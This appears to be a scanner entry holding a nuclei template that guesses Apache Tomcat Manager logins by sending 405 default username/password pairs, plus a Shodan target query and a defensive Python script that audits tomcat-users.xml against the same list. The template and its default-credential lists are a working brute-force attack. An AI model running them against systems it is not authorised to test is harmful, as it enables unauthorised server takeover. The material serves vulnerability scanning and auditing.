tomcat-default-login: Apache Tomcat Manager Default Login

Date: 2025-08-01 | Affected software: Apache Tomcat Manager | PoC: public

Vulnerability description

Apache Tomcat Manager instances that still accept default login credentials were discovered. This template requests /manager/html with HTTP Basic authentication and tries multiple username/password combinations (every pairing of the listed usernames and passwords, 15 x 27 = 405 requests), reporting a finding when the Manager status page is returned.

PoC code [public]

id: tomcat-default-login

info:
  name: Apache Tomcat Manager Default Login
  author: pdteam,sinKettu,nybble04
  severity: high
  description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations.
  reference:
    - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/
    - https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt
  classification:
    cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
  metadata:
    max-request: 405
    vendor: apache
    product: tomcat
    shodan-query: title:"Apache Tomcat"
  tags: tomcat,apache,default-login,vuln

http:
  - raw:
      - |
        GET /manager/html HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}

    payloads:
      username:
        - ADMIN
        - QCC
        - admin
        - both
        - cxsdk
        - demo
        - j2deployer
        - manager
        - ovwebusr
        - role
        - role1
        - root
        - server_admin
        - tomcat
        - xampp
      password:
        - ADMIN
        - OvW*busr1
        - Password1
        - QLogic66
        - admanager
        - admin
        - adrole1
        - adroot
        - ads3cret
        - adtomcat
        - advagrant
        - changethis
        - demo
        - j2deployer
        - kdsxc
        - manager
        - owaspbwa
        - password
        - password1
        - r00t
        - role1
        - root
        - s3cret
        - tomcat
        - toor
        - vagrant
        - xampp
    attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb
    threads: 30

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Apache Tomcat"
          - "Server Information"
        condition: and

      - type: word
        part: body
        words:
          - "Tomcat Version"
          - "JVM Version"
          - "JVM Vendor"
          - "OS Name"
          - "OS Version"
          - "OS Architecture"
          - "Hostname"
          - "IP Address"
        condition: or

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210087a2cf9ba1b91098afb27b6a048e3e5302a7ee589f41026d56747e61c9904ffb02203b940e873f079479c30415912b91edf8850fa5454a970874b92cb9e62e2cb7a6:922c64590222798bb761d5b6d8e72950
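As an added defender-side example (not part of the template or the nuclei project), the script below reuses the template's two payload lists to audit a Tomcat server's own tomcat-users.xml: it enumerates the same clusterbomb pairings the template would send and flags any configured user whose plaintext credentials fall in that set, noting whether that user also holds a Manager role. The sample XML is constructed here for illustration.

```python
import xml.etree.ElementTree as ET
from itertools import product

# Credential lists copied from the template's payloads section (15 usernames, 27 passwords).
DEFAULT_USERNAMES = ["ADMIN", "QCC", "admin", "both", "cxsdk", "demo", "j2deployer",
    "manager", "ovwebusr", "role", "role1", "root", "server_admin", "tomcat", "xampp"]
DEFAULT_PASSWORDS = ["ADMIN", "OvW*busr1", "Password1", "QLogic66", "admanager", "admin",
    "adrole1", "adroot", "ads3cret", "adtomcat", "advagrant", "changethis", "demo",
    "j2deployer", "kdsxc", "manager", "owaspbwa", "password", "password1", "r00t",
    "role1", "root", "s3cret", "tomcat", "toor", "vagrant", "xampp"]
# Roles that grant access to the Manager application.
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status"}

# Constructed sample tomcat-users.xml (not from any real deployment).
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="ops" password="Zq9!vL2#pXwR" roles="manager-gui"/>
  <user username="demo" password="demo" roles=""/>
</tomcat-users>
"""

def clusterbomb_pairs():
    """Every (username, password) pair the template sends: attack mode clusterbomb
    is the full cartesian product of the two payload lists, matching max-request: 405."""
    return list(product(DEFAULT_USERNAMES, DEFAULT_PASSWORDS))

def audit_tomcat_users(xml_text):
    """Return the users in a tomcat-users.xml whose plaintext credentials would be
    accepted by one of the template's requests, in file order."""
    root = ET.fromstring(xml_text)
    weak = set(clusterbomb_pairs())
    findings = []
    for elem in root.iter():
        if elem.tag.split("}")[-1] != "user":   # strip the tomcat.apache.org namespace
            continue
        # Tomcat's MemoryUserDatabase accepts either "username" or "name" for the login name.
        name = elem.get("username") or elem.get("name")
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        if (name, password) in weak:
            findings.append({"username": name, "manager": bool(roles & MANAGER_ROLES)})
    return findings

if __name__ == "__main__":
    for f in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"default credential in use: {f['username']} (manager role: {f['manager']})")
```

Hashed or digested passwords in tomcat-users.xml will not match the plaintext list, so this check only covers the plaintext form; a user on a hit that also has a manager role is the case the template reports.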
